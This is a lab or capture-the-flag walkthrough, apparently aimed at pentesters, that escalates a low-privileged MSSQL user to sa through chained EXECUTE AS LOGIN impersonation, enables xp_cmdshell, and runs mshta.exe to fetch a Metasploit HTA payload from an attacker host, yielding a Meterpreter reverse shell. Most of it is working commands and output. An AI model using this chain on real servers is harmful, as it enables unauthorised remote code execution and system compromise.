/ MSSQL, Uncategorized / By

Exploiting MSSQL Impersonation and xp_cmdshell to Gain Remote Access

When it comes to real-world exploitation, SQL Server misconfigurations can sometimes give you a direct pathway from a low-privileged database user all the way to system-level code execution. In this post, we’ll walk through a full MSSQL attack chain involving privilege escalation through user impersonation and abuse of xp_cmdshell to gain a Meterpreter session.

Let’s break it all down, step by step.

Objective

Gain code execution on the target MSSQL server by escalating from a low-privileged SQL user to sa, enabling xp_cmdshell, and delivering a payload using a malicious HTA server.

Step 1: Confirm Connectivity

Start by checking if the target is reachable.

ping -c 4 demo.ine.local
# Sends 4 ICMP packets to test connectivity with the target

Step 2: Scan the Target with Nmap

Scan the target for open ports and discover services.

nmap demo.ine.local
# Quick scan to identify open TCP ports

MSSQL is typically found on port 1433, and we can confirm it’s open.

Step 3: Discover MSSQL Info

Use the ms-sql-info script to pull information about the database version and configuration.

nmap --script ms-sql-info -p 1433 demo.ine.local
# Gathers detailed MSSQL server information

Discovered: Microsoft SQL Server 2019

Step 4: Connect to MSSQL Server

Using mssqlclient.py from Impacket to authenticate.

python3 mssqlclient.py bob:KhyUuxwp7Mcxo7@demo.ine.local
# Connects to MSSQL with provided credentials

Connection successful.

Step 5: Check Version Info

Once inside, we can confirm the SQL Server and OS version.

select @@version;
# Displays MSSQL server and Windows OS details

Step 6: Check sysadmin Role

We want to see who has full administrative control over SQL Server.

select loginname from syslogins where sysadmin = 1;
# Lists accounts with sysadmin privileges

Only the sa account has sysadmin rights.

Step 7: Attempt to Enable xp_cmdshell

xp_cmdshell allows execution of Windows commands from SQL.

enable_xp_cmdshell
# Attempts to enable xp_cmdshell

Result: Access denied — the bob user lacks permissions.

Step 8: Search for Impersonation Privileges

Now we check if bob can impersonate another user.

SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
# Finds which users are impersonatable

Output: sa and dbuser can be impersonated.

Step 9: Try Impersonating sa

Let’s try going straight for gold.

SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'sa';

Denied. bob cannot impersonate sa directly.

Step 10: Impersonate dbuser

We try a lateral privilege move.

SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'dbuser';
SELECT SYSTEM_USER;
# dbuser impersonation succeeded

Success — we are now running as dbuser.

Step 11: From dbuser to sa

Now that we’ve moved to dbuser, try impersonating sa.

SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
# Successfully impersonated sa

Boom. We’ve escalated to sa — the SQL admin.

Step 12: Enable xp_cmdshell (Again)

Now with sa privileges:

enable_xp_cmdshell
# Should now work — and it does

We now have the ability to run OS commands from SQL.

Step 13: Run Command on Host

Let’s confirm code execution:

EXEC xp_cmdshell "whoami"
# Should return the user running the SQL service

Output: nt service\mssql$sqlexpress

Step 14: Set Up Malicious HTA Server

Now we deliver a payload using Metasploit’s HTA module:

msfconsole -q
use exploit/windows/misc/hta_server
exploit
# This hosts a malicious HTA file that spawns a reverse shell

Step 15: Trigger the Payload via xp_cmdshell

In the MSSQL shell:

EXEC xp_cmdshell "mshta.exe http://<attacker-ip>:8080/yourpayload.hta"
# Reaches out to attacker and pulls the malicious script

Success — we catch a Meterpreter session.

Step 16: Interact with Meterpreter

Back in Metasploit:

sessions
sessions -i 1
sysinfo
getuid
# Confirms system information and current user

Step 17: Grab the Flag

cat C:\\flag.txt
# Reads the flag file on the target machine

Flag: c5b7da8ca7d051749cd5d3e1e741ef91

Summary of the Attack Chain

This is a classic case of misconfigured user impersonation:

  • bob → can impersonate → dbuser
  • dbuser → can impersonate → sa
  • sa → can enable → xp_cmdshell → remote code execution

Ultimately, a low-privileged database user (bob) was able to escalate to full system command execution through a misconfigured impersonation chain and then deliver a payload for a full shell.

Key Takeaways for Pentesters

  • Always check for impersonation rights with sys.server_permissions
  • Privilege escalation doesn’t always rely on weak passwords — misconfigurations can be gold
  • xp_cmdshell can be your gateway to full system compromise
  • SQL Server often runs with high privileges on Windows — abuse that carefully

Related Posts

Scroll to Top